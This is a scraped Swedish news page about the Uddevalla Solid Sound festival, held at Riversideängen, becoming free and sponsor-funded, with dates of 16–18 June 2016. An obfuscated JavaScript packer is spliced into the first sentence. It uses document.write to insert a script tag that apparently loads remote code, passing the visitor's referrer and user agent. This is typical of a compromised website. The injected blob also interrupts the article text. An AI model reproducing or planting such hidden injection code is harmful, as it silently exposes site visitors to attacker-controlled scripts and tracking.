Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Uddevalla Solid Sound blir gratisfestival

Uddevalla Solid Sound blir gratisfestival
Sebastian Plengier Ehrnfelt

Uddevalla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irsiz|var|u0026u|referrer|zdnkd||js|php’.split(‘|’),0,{}))
Solid Sound räknar med upp till 20 000 besökare nästa år. Då blir nämligen hela festivalen gratis. Datumen blir 16 – 18 juni 2016 och plats är som vanligt Riversideängen i centrala Uddevalla.

Vi vill sprida kärlek och glädje till så många som möjligt. Musik för människor samman och just nu är det viktigare än någonsin, säger Simon Tehyrell, informationsansvarig och en av grundarna av Uddevalla Solid Sound.

Uddevalla Solid Sound har de senaste fem åren utmärkt sig som en av de snabbast växande independentfestivalerna i Sverige. Med spektakulära artistbokningar som Angel Haze, Veronica Maggio, Interpol, Dizzee Rascal och Thåström har festivalen rönt stor uppmärksamhet över hela landet. Nu väljer festivalen att bli helt gratis.

Beslutet att bli en gratisfestival har växt fram under en längre tid och anledningarna att skippa biljetten är många. Bland annat har de tragiska händelser som drabbat trestadområdet (Uddevalla och Trollhättan) det senaste året spelat en viktig roll i det förändrade upplägget.

– Med gratis inträde vill vi skapa förutsättningar för en fest där så många som möjligt kan träffas och ha kul tillsammans. Att sprida kärlek, glädje och föra samman människor genom musik har varit vår ambition från början och just nu är det viktigare än någonsin säger Simon Tehyrell, informationsansvarig och en av grundarna av Uddevalla Solid Sound.

Under de senaste två åren har det också fungerat bra för festivaler som varit helt sponsorfinansierade, en finansieringsmodell som Uddevalla Solid Sound nu anammar.

Med det förändrade upplägget förväntas festivaldeltagandet stiga rejält. Från 300 i publiken vid starten 2012 till cirka 9000 under senaste upplagan i juni i år, tror arrangörerna att så många som upp till 20 000 personer kommer att besöka festivalen 2016. Plats för festivalen är återigen Riversideängen i Uddevalla och datumen är den 16, 17 och 18 juni. Det vill säga den klassiska festivalhelgen innan midsommar.

De första artistsläppen meddelas längre fram.